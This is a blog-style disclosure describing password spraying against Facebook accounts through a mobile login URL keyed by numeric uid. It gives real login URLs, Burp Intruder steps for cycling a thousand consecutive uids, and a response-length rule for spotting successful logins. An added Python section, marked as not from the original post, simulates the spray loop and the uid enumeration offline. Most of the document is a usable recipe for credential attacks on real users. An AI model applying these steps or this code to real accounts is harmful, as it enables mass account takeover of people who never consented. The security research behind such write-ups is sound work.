Password Spraying on Facebook Users without Email




Hello Friends,

I found that it's possible to perform a password spraying attack on Facebook users without knowing their email addresses (or any other identifier besides the numeric uid).


Password spraying is an attack that takes a large number of usernames and tries each of them against a single password. Several rounds with different passwords are possible, but the number of passwords attempted is usually small compared to the number of users attempted. Because each account sees only a few guesses, the attack stays under per-account lockout thresholds, and it is often more effective at uncovering weak passwords than targeting a specific user.



Recently, I found that it's possible to log in to a Facebook account without entering the email: the mobile login page below identifies the account by the numeric uid in the URL, so only the password has to be entered.


https://free.facebook.com/login/device-based/password/?uid=100015345936046&flow=login_no_pin&_rdc=2&_rdr


This behaviour makes it possible to run a password spraying attack against Facebook users by uid, with no email address needed.



Proof of Concept:

First, visit this URL: https://free.facebook.com/login/device-based/password/?uid=100006474705156&flow=login_no_pin&&_rdr
Change the uid to that of the victim or any other Facebook user.
Enter the password you want to spray and intercept the request with Burp.
Send the request to Intruder.
Under Positions, mark the uid (or only its last few digits) as the payload position; under Payloads, supply the uids or last digits as a sequential number range, then start the attack.


It is also possible to spray several passwords in the same run (the limit is low) and to repeat the run with a new set.




In the screenshot above, I brute-forced only the last three digits of the uid, i.e. one thousand consecutive Facebook accounts.

The response length is the oracle: a length in the 1000s (1527 in the screenshot) means the password was wrong, while a length in the 2000s (2417 in the screenshot) means the login succeeded, i.e. the password of that Facebook user was found.
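As an added example, not code from the original post: a Python simulation of the uid-keyed spray described in the steps above, with the login endpoint replaced by an in-memory stand-in so it runs offline. The response sizes, the per-account lockout threshold and the credential store are all constructed assumptions; the only things taken from the post are the URL format, the last-three-digits uid range and the rule that a larger response means the password was found. It also contrasts the spray loop with the single-target brute force that the lockout rule is meant to stop.

```python
from dataclasses import dataclass, field
from urllib.parse import urlencode

# Base URL and path taken from the post; the _rdc/_rdr tracking parameters are left out.
BASE_URL = "https://free.facebook.com/login/device-based/password/"

# Constructed, hypothetical credential store for the simulated server: uid -> password.
ACCOUNTS = {
    100006474705001: "Summer2023!",
    100006474705002: "Tr0ub4dor&3",
    100006474705003: "Summer2023!",   # same weak password reused by a second account
    100006474705004: "correct horse battery staple",
}

# Assumed policy of the simulated server: lock an account after this many wrong guesses.
LOCKOUT_THRESHOLD = 5

# Assumed length oracle, modelled on the post's 1527-vs-2417 observation.
FAIL_PAGE = "wrong password page " + "." * 1500
SUCCESS_PAGE = "logged-in home page " + "." * 2400
LOCKED_PAGE = "account temporarily locked"
LENGTH_THRESHOLD = 2000


def build_login_url(uid: int, flow: str = "login_no_pin") -> str:
    """Build the uid-keyed login URL from the post, without the _rdc/_rdr parameters."""
    return BASE_URL + "?" + urlencode({"uid": uid, "flow": flow})


def uid_range(sample_uid: int, digits: int = 3) -> range:
    """Every uid sharing all but the last `digits` digits with sample_uid.

    This is the Intruder payload the post describes: a sequential number range
    substituted for the last three digits of a known uid.
    """
    base = sample_uid - sample_uid % 10 ** digits
    return range(base, base + 10 ** digits)


def classify(body: str) -> bool:
    """True when the response length says the login succeeded (the post's oracle)."""
    return len(body) >= LENGTH_THRESHOLD


@dataclass
class FakeLoginServer:
    """In-memory stand-in for the login endpoint; constructed for this example only."""
    failures: dict = field(default_factory=dict)
    locked: set = field(default_factory=set)
    requests: int = 0

    def login(self, uid: int, password: str) -> str:
        self.requests += 1
        if uid in self.locked:
            return LOCKED_PAGE
        if ACCOUNTS.get(uid) == password:
            return SUCCESS_PAGE
        # Unknown uids get the same failure page as wrong passwords, so the
        # attacker cannot tell the two apart by length.
        self.failures[uid] = self.failures.get(uid, 0) + 1
        if self.failures[uid] >= LOCKOUT_THRESHOLD:
            self.locked.add(uid)
        return FAIL_PAGE


def spray(server: FakeLoginServer, uids, passwords) -> dict:
    """Password-outer, uid-inner loop: every account sees at most len(passwords) guesses."""
    hits = {}
    for password in passwords:
        for uid in uids:
            if uid in hits:
                continue
            if classify(server.login(uid, password)):
                hits[uid] = password
    return hits


def brute_force_one(server: FakeLoginServer, uid: int, passwords):
    """The contrasting single-target loop: many guesses against one uid."""
    for password in passwords:
        if classify(server.login(uid, password)):
            return password
    return None


if __name__ == "__main__":
    srv = FakeLoginServer()
    # Three common passwords against the 1000 uids that share the post's uid prefix.
    found = spray(srv, uid_range(100006474705156), ["Summer2023!", "Password1", "Welcome1"])
    print(found)                              # {100006474705001: 'Summer2023!', 100006474705003: 'Summer2023!'}
    print("locked accounts:", srv.locked)     # set()

    srv2 = FakeLoginServer()
    # Six guesses at one account: the correct password is only reached after lockout.
    print(brute_force_one(srv2, 100006474705002, ["a", "b", "c", "d", "e", "Tr0ub4dor&3"]))  # None
    print("locked accounts:", srv2.locked)    # {100006474705002}
```

The spray finds the two accounts sharing the weak password after three guesses per uid, so no account reaches the (assumed) lockout threshold; the single-target loop against one uid locks that account on its fifth wrong guess and never sees the success page even when it finally tries the right password. That asymmetry is why spraying is the attacker's preferred loop order, and why a per-account lockout alone does not stop it; a uid-keyed login form simply hands the attacker an easy, enumerable username space.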
 


Password spraying finds weak passwords, so pick a strong, unique password, use a different password for each account, and never share your password.


 
